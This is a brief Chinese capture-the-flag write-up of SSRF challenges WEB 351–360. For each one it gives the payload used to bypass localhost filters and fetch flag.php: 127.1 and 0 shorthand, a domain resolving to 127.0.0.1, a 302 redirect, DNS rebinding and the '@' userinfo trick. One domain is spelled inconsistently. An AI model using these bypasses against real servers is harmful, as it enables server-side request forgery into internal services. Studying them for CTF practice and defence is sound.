WEB 351
直接访问flag.php
显示非本地用户禁止访问,但是既然是ssrf专题,那就post url=127.0.0./flag
WEB 352
限定了协议为http或者https,同时过滤127.0.0
127.1会被解析成127.0.0.1,也就意味着为零可缺省 在Linux中,0也会被解析成127.0.0.1 127.0.0.0/8是一个环回地址网段,从127.0.0.1 ~ 127.255.255.254都表示localhost ip地址还可以通过表示成其他进制的形式访问,IP地址二进制、十进制、十六进制互换 来源于:https://blog.csdn.net/Xxy605/article/details/114988116
这里传入 url=http://127.1.1.1/flag.php
WEB 353
同上
WEB 354
过滤了0和1,这题有两种方法
一种是改本地域名的A记录到127.0.0.1上,然后访问http://域名/flag.php 即可(也可在自己域名服务器上搭建302跳转)
另一种访问suo.cc即可,suo.cc就代表着127.0.0.1
post: url=http://sudo.cc/flag.php
WEB 355
限制长度,用0即可
post:url=http://0/flag.php
也可 url=http://127.1/flag.php
//0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0
WEB 356
长度限制为3(127.1不行了),同上
url=http://0/flag.php
WEB 357
要求是有效ip,同时不能是保留ip和私有ip。
可以用自己的域名localtion
<?php header("Location: http://127.0.0.1/flag.php");
没域名的可以用DNS重绑定漏洞,利用这个网站
看wp要放127.0.0.1再第二个
让后访问即可post url=http://r.申请的域名/flag.php
WEB 358
只能访问符合正则的url,url 字符串要以 http://ctf开头,show结尾
payload:post:http://ctf.@127.0.0.1/flag.php?show
这样解析后ctf会作为登入用户,而ip是127.0.0.1
WEB 359/360
留着后面做